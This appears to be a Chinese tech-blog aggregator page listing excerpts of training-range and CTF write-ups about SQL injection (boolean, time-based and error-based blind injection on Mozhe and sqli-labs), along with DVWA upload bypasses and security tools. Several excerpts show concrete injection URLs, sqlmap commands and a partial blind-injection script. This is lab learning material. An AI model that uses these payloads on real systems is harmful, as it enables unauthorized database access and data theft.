E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
漏洞测试
墨者学院 - SQL手工注入
漏洞测试
(Sql Server数据库)
手工SQL注入过程,数据库执行的语句,是页面提交至服务器应用程序,应用程序获取id的值,然后把值拼接到查询语句中,在到数据库中查询,通过程序解析后,把结果返回在页面上,(使用时请将mozhe.cn替换成对应的靶场地址)。开启靶场环境:第1步:页面提交:http://mozhe.cn/new_list.php?id=2数据库执行语句:select*frommanagewhereid=2页面返回描述:
多崎巡礼
·
2020-07-29 23:18
sql
sqli-labs靶机环境搭建(手把手教学)
sqli-labs靶机环境搭建SQLI-LABS是集成了多种SQL注入类型的
漏洞测试
环境,可以用来学习不同类型的SQL注入。
WencyH
·
2020-07-29 16:53
墨者学院的靶场之SQL注入
漏洞测试
(布尔盲注)
这是我作为小白第一次成功的把key找出来了,分享一下墨者学院的靶场SQL注入
漏洞测试
(布尔盲注)IP地址:219.153.49.228端口:40205协议:http首先我输入了IP地址和端口号看到这个后
BEGCCYD
·
2020-07-29 15:04
墨者学院的靶场
mysql
sql
动网论坛8.2经典注入漏洞利用
192.168.1.2目标机:192.168.1.3四、实验步骤一、正常注册登录1、访问地址:http://192.168.1.3:8010/,如图示:2、首先注册一个用户:san密码:123456,如图:二、
漏洞测试
与利用
Unitue_逆流
·
2020-07-29 10:46
web安全漏洞
墨者学院——SQL注入
漏洞测试
(布尔盲注)
题目:背景介绍一位热心的网友再次向“墨者”安全工程师挑战,“墨者”工程师在注入时发现网页无回显,“墨者”工程师想了一会就注入完成拿到了key。所以从这里的URL入手,存在注入点利用sqlmap注入:sqlmap.py-uurl--current-db获取到的数据库名是stormgroupsqlmap.py-uhttp://219.153.49.228:42218/new_list.php?id=1
LEO-max
·
2020-07-29 03:00
CTF学习
墨者学院SQL注入
漏洞测试
(报错盲注)
手动注入方式https://www.mozhe.cn/bug/detail/Ri9CaDcwWVl3Wi81bDh3Ulp0bGhOUT09bW96aGUmozhe用到方法substr()、updatexml()、concat()可以用的方法:sqlmap工具、手动注入思路:找到注入点通过注入点查看哪里可以替换SQL语句找到对应的版本数据库信息获取数据1、找到注入点(在管理台页面鼠标右键查看源代码
xiaoduu
·
2020-07-29 00:00
SQL注入
mysql
安全
墨者学院-SQL注入
漏洞测试
(布尔盲注)
两种方法一种是用穿山甲跑,直接得到用户名密码。一种是使用python脚本跑,使用sqlmap也行,下面是我自己写的脚本跑库名(二分法查找)得到stormgroupimport stringimport requestsurl = "http://219.153.49.228:47151/new_list.php?id=1%s"payload = " and ascii(substr(databas
臭nana
·
2020-07-28 22:59
墨者学院
【墨者学院】SQL注入
漏洞测试
(时间盲注)
目标了解SQL时间盲注掌握SQL注入语法掌握SQL注入原理了解SQL注入常用注释字符本题使用的工具sqlmap,hackbar环境物理机:windows10虚拟机:kali时间盲注1判断是否存在盲注可以发现判断有多种方式,只要能保证sleep()执行,就可以根据回显的时间判断是否存在时间注入命令1:http:/ip/flag.php?type=1andsleep(5)'命令2:http://ip/
ST0new
·
2020-07-28 15:49
Web安全
SQL注入
漏洞测试
(布尔盲注)
使用Sqlmap工具注入1、首先获取数据库名Pythonsqlmap.py-u"http://219.153.49.228:49953/new_list.php?id=1"--current-db2、从获取的数据名中查询数据中的表名Pythonsqlmap.py-u"http://219.153.49.228:46042/new_list.php?id=1"-Dstormgroup--tables
灯火冉珊
·
2020-07-28 10:40
sqlmap注入(布尔盲注)
本人小白仅仅作为学习笔记希望通过一次次的记录可以一次次的成长sqlmap是一个自动化的sql注入工具,主要功能是扫描发现并利用注入漏洞使用墨者学院的靶机进行测试这里我们使用的是SQL注入
漏洞测试
(布尔盲注
不修缝纫机
·
2020-07-28 09:56
墨者靶场 入门:SQL注入
漏洞测试
(布尔盲注)
墨者靶场入门:SQL注入
漏洞测试
(布尔盲注)题目背景介绍实训目标解题方向解题步骤题目背景介绍一位热心的网友再次向“墨者”安全工程师挑战,“墨者”工程师在注入时发现网页无回显,“墨者”工程师想了一会就注入完成拿到了
CN_wanku
·
2020-07-28 09:12
靶场实战
墨者 - SQL注入
漏洞测试
(时间盲注)
按照题意,正规思路flag.php?type=1%20and%20if(length(database())=12,sleep(5),1)%20--+通告sleep()函数判断数据长度然后用flag.php?type=1%20and%20if(substr(database(),1,1)='s',sleep(5),1)%20--+用bp字典结合substr函数爆库==>爆表==>爆字段==>爆字段
吃肉唐僧
·
2020-07-28 08:52
墨者刷题笔记
SQL注入
漏洞测试
(报错盲注)
1.判断注入,输入’显示语法错误说明有注入点2.爆数据库http://219.153.49.228:44996/new_list.php?id=1’andupdatexml(1,concat(0x7e,(selectdatabase()),0x7e),1)–+3.爆表http://219.153.49.228:44996/new_list.php?id=1’andupdatexml(1,conca
qq_36933272
·
2020-07-28 07:15
SQL注入
漏洞测试
(布尔盲注)
一.SQL盲注的定义盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。盲注一般分为布尔盲注和基于时间的盲注和报错的盲注。本次主要讲解的是基于布尔的盲注。二.直接上实战就拿这个网站的后台管理系统为例,我们先用御剑目录扫描网站目录,居然发现他登陆按钮底下的提示文字目录很有意思,去访问一下:很容易看出来,这个停机维护的文字肯定存放在数据库中的,我们试试他有没有漏
cpzxm
·
2020-07-27 11:03
网络安全
ElasticSearchd未授权访问
1.熟悉的响应YouKnow,forSearch2.
漏洞测试
安装了river之后可以同步多种数据库数据(包括关系型的mysql、mongodb等)。
我要变超人
·
2020-07-24 19:00
漏洞挖掘之乱拳打死老师傅——Fuzzer
相比于形式化的软件
漏洞测试
技术(比如,符号执行技术),Fuzzer往往能够在实际的应用中挖掘更多的漏洞。
woswod
·
2020-07-15 09:12
漏洞挖掘
DVWA平台
漏洞测试
平台__上传漏洞
DVWA平台上传漏洞攻击手法本地端js验证(本地端验证,下为服务端验证)可用浏览器关闭:判断:错误提示很快;审查元素看有无js代码.htaccess绕过限制上传,依据文件名包含的字符自定义解析文件。如下,只要文件名含php.gif就能解析该文件成php执行%00截断上传(%00截断规则:地址如遇上%00字符会自动截断.注意:使用%00截断时,务必将字符串%00采用url编码后上传.)文件头修改(老
dfu65065
·
2020-07-14 01:12
MSF漏洞攻击练习系统 – Metasploitable2
Metasploitable2是Metasploit团队维护的一个集成了各种漏洞弱点的Linux主机(ubuntu)镜像,方便广大黑扩跟安全人员进行MSF
漏洞测试
跟学习,免去搭建各种测试环境。
weixin_30537391
·
2020-07-12 23:08
19个练习黑客技术的在线网站
APP涵盖了所有常见的iOS安全漏洞,它免费并开放源码,
漏洞测试
和解决方案覆盖
CobItry
·
2020-07-12 10:47
分享
各种Web
漏洞测试
平台
SqliLab支持报错注入、二次注入、盲注、Update注入、Insert注入、Http头部注入、二次注入练习等。支持GET和POST两种方式。https://github.com/Audi-1/sqli-labsDVWA(DamVulnerableWebApplication)DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲
weixin_30892987
·
2020-07-12 07:47
DVWA之跨站脚本攻击
漏洞测试
01-反射型XSS
目录结构一、XSS概述1.XSS简介2.XSS测试策略二、反射型XSS概述三、全等级反射型XSS
漏洞测试
1.Level:Low2.Level:Medium3.Level:High4.Level:Impossible
Fighting_001
·
2020-07-10 15:04
网络安全:
漏洞测试
主要平台 BackTrack4+Metasploit+ruby
BackTrack4-Finallinux系统常用命令:startxpoweroffBackTrack4后使用了ubuntu8.10的系统,而且只能装Debian的软件包。2011年5月11日,BackTrack发布了最新的BackTrack5,基于ubuntu10.04LTS(Long-TermSupport)内核为Kernel2.6.38。本版BackTrack对于无线安全的检查能力更为强悍,
ann__1121
·
2020-07-09 13:35
渗透测试-Android-App渗透测试测试流程
渗透测试-Android-App渗透测试测试流程0x01:前言:仅作为记录以供参考0x02:
漏洞测试
方法以及修复方案一、组件以及源码安全1、签名校验命令://test.apk为要检测的包jarsigner.exe-verifytest.apk-verbose–certs
weixin_33919950
·
2020-07-08 16:33
渗透工程学习:搭建本地服务器
漏洞测试
平台(一)
虚拟机网络设置1记录目的2实战部分2.1前期准备2.2配置虚拟机网络2.2.1设置虚拟机2.2.2设置本机2.3完成测试截图2.3.1ping测试2.3.1虚拟机上网测试3总结1记录目的本篇博客记录的是学习渗透教程中的实战部分:使虚拟机中的win2003、xp,与本机win10实现ping通,并且两台虚拟机能实现上网功能。将三个系统连接起来,能很好的为后续内网渗透、网站渗透打下基础,所以这个是必须
cherry_cmj
·
2020-07-07 05:13
#
个人学习记录-渗透工程
[原创]K8 Struts2 Exp 20170310 S2-045(Struts2综合漏洞利用工具)
发布:2014/7/3110:24:56简介:K8Struts2综合漏洞利用工具(ApacheStrutsRemoteCodeExecutionExploit)Struts2漏洞检测工具Struts2
漏洞测试
工具
weixin_30446613
·
2020-07-06 19:00
常见端口及其对应漏洞
也可跑弱口令22SSH弱口令爆破23telnet弱口令爆破80-90WEB常见WEB漏洞以及一些为管理后台161snmppublic弱口令389ldap是否为匿名访问443openssl心脏出血以及一些WEB
漏洞测试
再凌
·
2020-07-06 01:08
启用了TRACE 和TRACK HTTP 方法,如何禁用?
/de1f4ad2195f312b3169a50d.htmlhttp://www.myhack58.com/Article/html/3/62/2012/32870.htm(httpTRACE跨站攻击
漏洞测试
与防御修复
wbryfl
·
2020-07-05 20:33
NetWork
一键搭建
漏洞测试
环境:Vulhub
Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。漏洞环境Apache_parsing_vulnerabilityElasticsearchGlassfish/4.1.0HeartbleedHttpoxyImagetragickNginx_parsing_vulnerabilityNginx_php5_mysqlPHP_xxeSh
行书以鉴
·
2020-07-05 09:52
SQL手工注入
漏洞测试
(Sql Server数据库)解题思路小记
靶环境:IIS+ASP+SqlServer,Aspx代码对客户端提交的参数未做任何过滤。解题目标:手工进行SQL注入测试,获取管理密码登录。使用sqlmap获取数据库中的表名和字段名;如图:通过:sqlmap.py-uhttp://219.153.49.228:48753/new_list.asp?id=2--dbs获取数据库中的表名sqlmap.py-uhttp://219.153.49.228
Routine_limon
·
2020-07-04 08:41
web安全
信息安全常识
也可跑弱口令22SSH弱口令爆破23Telnet弱口令爆破80-90Web常见Web漏洞以及一些为管理后台161Snmppublic弱口令389Idap是否为匿名访问443Openssl心脏出血以及一些Web
漏洞测试
SunJ3t
·
2020-07-02 14:22
D-LINK路由器后门
漏洞测试
方法
国家互联网应急中心http://www.cert.org.cn/publish/main/9/index.html多款D-LINK路由器产品存在后门漏洞(受影响的D-LINK路由固件版本涉及DIR-100、DI-524、DI-524UP、DI-604S、DI-604UP、DI-604+、TM-G5240、TM-G5240、BRL-04R、BRL-04UR、BRL-04CW、BRL-04FWU)D-
myths_0
·
2020-07-02 13:00
Github网络安全军火库
导读本文内容包括:漏洞及其渗透练习平台、花式扫描器、信息搜集工具、Web相关、Windows域渗透利用工具、模糊测试工具、
漏洞测试
及其攻击框架、漏洞POC&EXP、中间人攻击及钓鱼、密码破解、二进制分析
鸾林居士
·
2020-07-01 16:50
GitHub
少年,这是我特意为你酿制的Oracle 注入,干了吧!
最近遇到Oracle注入的测试越来越多,而且互联网上oracle注入的总结较为少见,为了能够快速的进行
漏洞测试
和挖掘,诞生了想要把之前学习的Oracle注入方式进行温习和总结的想法,便写下这一篇关于Oracle
漏斗社区
·
2020-06-30 09:23
Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现
影响版本ApacheShiro<=1.2.4默认shiro的commons-collections版本为3.2.1,环境搭建
漏洞测试
抓包测试查看返回包里setcookie有rememberme的字样继续测试首先最简单的测试方法是用
偷一个月亮
·
2020-06-30 08:16
RCE
OpenVAS漏洞评估系统
其强大的评估能力来自于集成的数万个
漏洞测试
程序,这些测试程序以插件的形式提供,可以从官方网站免费更新。
Xysoul
·
2020-06-30 04:44
工具使用
OpenVas 漏洞扫描器使用教程
它的评估能力来源于数万个
漏洞测试
程序,openvas早起版本还有一个客户端,现在的版本已经不提供客户端程序,现基于B/S(浏览器/服务器)架构进行工作,执行扫描并提供扫描结果。
xianjie0318
·
2020-06-30 00:32
信息安全
cve-2020-7066简单解析
id=79329get_headers()会截断URL中空字符后的内容这是在php7.3中发现的,但是一直有这个
漏洞测试
脚本显示这会让恶意脚本获取意外域名的header。
ruokeqx
·
2020-06-29 16:00
CTF入坟
搜索型SQL注入及SQL
漏洞测试
搜索型注入原理和数据型,字符型注入相差不大,都是通过构造一个合法的语句,当参数传入后台后,造成一个合法的SQL语句闭合,从而将数据库里的数据遍历出来。首先打开客户端寻找纯在SQL注入漏洞的注入点。通过提示可知,尝试输入一个提示字符进行搜索,z这里我们输入字母’l’,可以看见后台给出的相关信息。通过后台给出的数据,和平台给的输入提示。我们可以设想后台是否用了搜索逻辑去进行相关数据的搜索从而返回相关数
讲人zhi讲
·
2020-06-29 14:08
SQL手工注入
漏洞测试
(Sql Server数据库)
SQLInjection:就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。首先让我们了解什么时候可能发生SQLInjectio
HeiY_
·
2020-06-29 12:00
使用Tamper Data登录zabbix服务器并实施安全检查
SimeonZabbix服务器在3.1版本以下存在SQL注入漏洞,通过该漏洞可以获取管理员的账号、密码和SessionID,zabbix的用户密码是采用md5加密,在实际
漏洞测试
过程中,很多公司都还是有安全意识
我是simeon
·
2020-06-29 11:57
安全技术研究
kali安装OpenVAS-9并创建扫描任务教程
其核心部件是一个服务器,包括一套网络
漏洞测试
程序,可以检测远程系统和应用程序中的安全问题。
下河捉鱼
·
2020-06-29 10:48
openvas
kali
openvas-9
pikachu漏洞靶机之xss漏洞xss钓鱼
跨站脚本
漏洞测试
流程①在目标站点上找到输入点,比如查询接口,留言板等;②输入一组“特殊字符+唯一识别字符”,点击提交后,查看返回的源码,是否有做对应的处理;③通过搜索定位到唯一字符,结合唯一字符前后语法确认是否可以构造执行
暮秋初九
·
2020-06-29 10:41
pikachu
【Tomcat】Tomcat-Ajp
漏洞测试
与修复
Tomcat漏洞详情Tomcat默认开启AJP连接器,方便与其他Web服务器通过AJP协议进行交互。由于Tomcat本身也内含了HTTP服务器,因此也可以视作单独的Web服务器。国家信息安全漏洞共享平台于2020年2月22日发布了一份关于ApacheTomcat存在文件包含漏洞的安全报告。该漏洞综合评级为“高危”,影响的产品版本包括:Tomcat6、Tomcat7、Tomcat8、Tomcat9。
密西西凌
·
2020-06-29 09:59
Tomcat
APP渗透测试基本内容与漏洞扫描介绍
天气越来越凉爽,在对客户网站代码进行渗透测试,
漏洞测试
的同时我们SINE安全渗透技术要对客户的网站源代码进行全方位的安全检测与审计,只有真正的了解网站,才能更好的去渗透测试,发现网站存在的漏洞,尽可能的让客户的网站在上线之前
SINE安全
·
2020-06-29 04:04
在线靶场-墨者-SQL注入1星-SQL手工注入
漏洞测试
(MySQL数据库)
尝试在URL后,输入and1=1显示正常,and1=2显示不正常,判断此处存在SQL注入orderby获取字段数为4and1=2unionselect1,2,3,4发现2在原文Title处,3在content处and1=2unionselect1,version(),database(),4爆库得到and1=2unionselect1,version(),(selectgroup_concat(t
笑棋
·
2020-06-29 03:06
在线靶场-墨者题目
在线靶场-墨者-SQL注入1星-SQL注入
漏洞测试
(布尔盲注)
解题方法:运用sqlmap工具对数据库进行爆破1.判断注入点存在:pythonsqlmap.py-u“ip”2.判断数据库名称:pythonsqlmap.py-u“ip”–dbs3.判断web当前使用的数据库:pythonsqlmap.py-u“ip”–current-dbs4.判断web当前使用的数据表:pythonsqlmap.py-u“ip”-Ddatabase--tables5.判断表中字
笑棋
·
2020-06-29 03:05
在线靶场-墨者题目
centos7安装OpenVAS 9漏洞评估系统
其核心部件是一个服务器,包括一套网络
漏洞测试
程序,可以检测远程系统和应用程序中的安全问题。用户需要一种自动测试的方法,并确保正在运行一种最恰当的最新测试。
yongbang_yan
·
2020-06-29 01:51
安全加固
运维
Linux系统10个开源漏洞检测工具
其核心部件是一个服务器,包括一套网络
漏洞测试
程序,可以检测远程系统和应
yongbang_yan
·
2020-06-29 01:20
安全加固
运维
墨者学院-SQL注入
漏洞测试
(HTTP头注入)
SQL注入
漏洞测试
(HTTP头注入)难易程度:★★题目类型:SQL注入使用工具:FireFox浏览器、burpsuite1.打开靶场,使用burpsuite访问网页,截包。
JimWu95
·
2020-06-28 23:33
Kalilinux安装openvas
其核心部件是一个服务器,包括一套网络
漏洞测试
程序,可以检测远程系统和应用程序中的安全问题。
weixin_34405557
·
2020-06-28 18:02
上一页
1
2
3
4
5
6
7
8
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他